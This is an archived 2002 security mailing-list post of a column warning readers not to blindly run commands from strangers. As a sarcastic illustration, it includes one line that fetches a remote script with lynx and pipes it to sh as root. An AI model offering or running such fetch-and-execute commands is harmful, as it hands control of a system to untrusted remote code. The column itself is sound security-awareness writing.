[ISN] Vet the code or pay the price

From: InfoSec News (isnat_private)
Date: Tue Oct 22 2002 - 23:02:01 PDT

  • Next message: InfoSec News: "Re: [ISN] Researchers predict worm that eats the Internet in 15 minutes"

    +------------------------------------------------------------------+
    |  Linux Security: Tips, Tricks, and Hackery                       |
    |  Published by Onsight, Inc.                                      |
    |                                                                  |
    |  22-October-2002                                                 |
    |  http://www.hackinglinuxexposed.com/articles/20021022.html       |
    +------------------------------------------------------------------+
    
    This issue sponsored by: Hacking Linux Exposed
    
    Learn how to think like an attacker in order to secure your Linux
    network.
    
    In the ever-changing world of global data communications, inexpensive
    Internet connections, and fast-paced software development, security
    is constantly being compromised. Linux has always been considered the
    digital playground for crackers. Many hacks, exploits, and network
    security tools are written on Linux because it's readily available.
    Hacking Linux Exposed: Linux Security Secrets & Solutions shows you,
    step-by-step, how to defend against the latest Linux attacks by
    understanding the hacker's methods and sinister thought processes.
    
    For more information, visit http://www.hackinglinuxexposed.com/
    
    --------------------------------------------------------------------
    
    Vet the code or pay the price
    By Brian Hatch
    
    Summary: Too many people blindly execute commands from anonymous
    strangers without checking to see what lays hidden, and leave
    themselves open to malicous attacks.
    
    The Internet and it's myriad mailing lists can offer a wealth of help
    and assistance when you have problems. When asking what obscure
    OpenSSL command you need convert your X509 certificate from .cer to
    .pem format you'll likely get an answer[1] from someone you've never
    met. When trying to fix your Apache configuration to block access to
    all .htaccess files, someone will provide a snippet[2] of
    configuration that can help you out.
    
    Unfortunately, many people blindly copy and paste the suggestions
    without analysing what they're given. In the best scenario, the
    commands will not work and may leave you thinking you'd fixed your
    problem. In the worst case, you may have been given a trojan that
    will break the security of your own system and hand it to the
    cracker. This sort of trick is common on security lists where someone
    posts 'exploit code' to test your software but actually binds a
    rootshell or deletes your files.
    
    Although most folks claim never to trust code from unknown sources, I
    can still tell that this happens every day. For example two weeks ago
    in this column I showed you how you could create a simple but
    effective firewall in 10 minutes[3]. The column included a shell
    script you could run with minimal changes. The top of the script read
    as follows:
    
      # Definitions
      EXT_INTERFACE=eth1
      EXT_IP=300.3.3.3
      INT_INTERFACE=eth0
      INT_IP=192.168.1.1
    
    The IP address I used was 300.3.3.3. Anyone who's played with IP much
    will see that this doesn't make sense. The bytes in a valid IP
    address range between 0 and 255. [4] By choosing 300, I guarenteed
    that this script would blow up if anyone tried to run it unaltered.
    
    And run it they did. I received five emails from folks telling me
    that the code didn't work, and that they got errors because of the
    invalid IP address.[5] I get these type of complaints frequently.
    
    (The other kind of mail I get frequently contains little more than 'I
    need a program that will let me break into my friends computer. Send
    it to me now!'. I get this so much that I thought I'd help out by
    providing the following which must, sadly, be run as root:
    
     lynx --source http://www.hackinglinuxexposed.com/auto-hack-script.f?IP | sh
    
    You must replace 'IP' with the IP or hostname you'd like to attack.)
    
    Hopefully I don't need to explain any further why you shouldn't
    blindly run code from others. Next week I'll explain the methods I
    use when writing examples to help keep others from accidentally
    running my commands as-is.
    
    NOTES:
    
    [1] openssl x509 -in file.cer -inform d -out file.pem
    
    [2] You'd use:
       <Files ~ "^\.ht">
          Order allow,deny
          Deny from all
       </Files>
    
    [3] http://www.hackinglinuxexposed.com/articles/20021008.html
    
    [4] Of course the values 0 and 255 are not available in some cases.
    The first and last IP addresses in your range are reserved for the
    network address and the broadcast address, respectively. Some routers
    still do not let you use 0 or 255 as an octet, even when the netmask
    makes it clear it is not a network or broadcast address.
    
    [5] *Hobbit* went so far to refer to this article as '10 minute error
    fodder' because of the illegal IP used throughout.
    
                                -------------                            
    Brian Hatch is Chief Hacker at Onsight, Inc and author of Hacking
    Linux Exposed and Building Linux VPNs. He doesn't trust code that
    anyone sends him, and certainly nothing he provides to himself. Brian
    can be reached at brianat_private
    
    --------------------------------------------------------------------
    This newsletter is distributed by Onsight, Inc.
    
    The list is managed with MailMan (http://www.list.org). You can
    subscribe, unsubscribe, or change your password by visiting
    http://lists.onsight.com/ or by sending email to
    linux_security-requestat_private
    
    Archives of this and previous newsletters are available at
    http://www.hackinglinuxexposed.com/articles/
    
    --------------------------------------------------------------------
    
    Copyright 2002, Brian Hatch.
    
    
    
    -
    ISN is currently hosted by Attrition.org
    
    To unsubscribe email majordomoat_private with 'unsubscribe isn'
    in the BODY of the mail.
    



    This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 01:43:37 PDT